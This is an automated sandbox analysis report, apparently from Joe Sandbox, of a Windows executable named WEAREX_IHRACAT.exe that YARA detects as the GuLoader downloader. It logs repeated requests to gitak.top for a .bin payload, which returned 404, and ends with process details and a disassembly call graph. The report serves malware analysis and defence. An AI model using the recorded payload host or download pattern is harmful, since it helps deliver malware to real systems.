                        2024-08-29 10:47:29 UTC1369INData Raw: 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:47:29 UTC916INData Raw: 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:47:29 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        42192.168.11.2049818172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:47:40 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:40 UTC673INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:40 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 63
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TijnKBodBwojS8fKVLojY4UC1Zb7qH4Z%2BxtG9PrWXRFiC80y5FNVswJzJLm0s5U0zdJRIgFfLZocw2Ur5PB80w5E4dR3i6Lkv31RTT9IhqHycTD8v6SWJwJBJCo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf6de0f7707fb-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:40 UTC696INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:40 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:47:40 UTC908INData Raw: 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30
                        Data Ascii: 415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:47:40 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        43192.168.11.2049819172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:47:50 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:51 UTC675INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:51 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 74
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6y9po9cH2nR7wTK5ZhBrQFqpL6XH8LRPJgEsXPzNxbZPFXkx604oL8xF8tKONIlMDQBjbn4NiZJ1F8%2F4MzoNkLpzMF4e%2FTLAfb3v07Zg4JJx8awOkQkv2DNogU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf720183182b6-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:51 UTC694INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:51 UTC1369INData Raw: 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:47:51 UTC910INData Raw: 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37
                        Data Ascii: 2.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627
                        2024-08-29 10:47:51 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        44192.168.11.2049820172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:48:01 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:48:01 UTC679INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:48:01 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 84
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkJ5muxbGh3WKoyUAuIjzC29ofOziiGvVSYbGuOiaLSxUxquXjRmKH4x0GOwL3PlJ%2BFgCW9S6PKXfKzgsUNHeYU%2BRtwomMTuu4KRYo%2BT%2FgzLC1BMk453BH0JSes%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf761c9cf588a-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:48:01 UTC690INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:48:01 UTC1369INData Raw: 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a
                        Data Ascii: ;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:48:01 UTC914INData Raw: 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36
                        Data Ascii: 53 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6
                        2024-08-29 10:48:01 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        45192.168.11.2049821172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:48:11 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:48:12 UTC677INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:48:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 95
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aDB4%2BOqdQtNoXmdnoTwWpdHpIsfDYmEtXWW0tXRoz%2FPb0Q5QiF31cAPs8jSnMVLyadDzg%2FnEfE4a7Z5xnOSQRkMHpJMIfIhboElqhIyGydqjP9Tiraq2vao8TE%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf7a3898859bc-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:48:12 UTC692INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:48:12 UTC1369INData Raw: 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:48:12 UTC911INData Raw: 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.6
                        2024-08-29 10:48:12 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:48:12 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:06:39:44
                        Start date:29/08/2024
                        Path:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
                        Imagebase:0x400000
                        File size:416'292 bytes
                        MD5 hash:2E620407C0B25239EF46534A34217C27
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2455393389.00000000031C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:06:40:09
                        Start date:29/08/2024
                        Path:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
                        Imagebase:0x400000
                        File size:416'292 bytes
                        MD5 hash:2E620407C0B25239EF46534A34217C27
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.6650157112.0000000001721000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:16.2%
                          Dynamic/Decrypted Code Coverage:15.2%
                          Signature Coverage:18.5%
                          Total number of Nodes:1512
                          Total number of Limit Nodes:37
                          execution_graph 4815 10001000 4818 1000101b 4815->4818 4825 1000152e 4818->4825 4820 10001020 4821 10001024 4820->4821 4822 10001027 GlobalAlloc 4820->4822 4823 10001555 3 API calls 4821->4823 4822->4821 4824 10001019 4823->4824 4826 10001243 3 API calls 4825->4826 4827 10001534 4826->4827 4828 1000153a 4827->4828 4829 10001546 GlobalFree 4827->4829 4828->4820 4829->4820 4830 404241 lstrcpynW lstrlenW 4831 401d41 GetDC GetDeviceCaps 4832 402b1b 18 API calls 4831->4832 4833 401d5f MulDiv ReleaseDC 4832->4833 4834 402b1b 18 API calls 4833->4834 4835 401d7e 4834->4835 4836 405f0a 18 API calls 4835->4836 4837 401db7 CreateFontIndirectW 4836->4837 4838 4024e6 4837->4838 4839 401a42 4840 402b1b 18 API calls 4839->4840 4841 401a48 4840->4841 4842 402b1b 18 API calls 4841->4842 4843 4019f0 4842->4843 4844 402744 4845 40273f 4844->4845 4845->4844 4846 402754 FindNextFileW 4845->4846 4847 4027a6 4846->4847 4849 40275f 4846->4849 4850 405ee8 lstrcpynW 4847->4850 4850->4849 4858 401cc6 4859 402b1b 18 API calls 4858->4859 4860 401cd9 SetWindowLongW 4859->4860 4861 4029c5 4860->4861 4092 401dc7 4100 402b1b 4092->4100 4094 401dcd 4095 402b1b 18 API calls 4094->4095 4096 401dd6 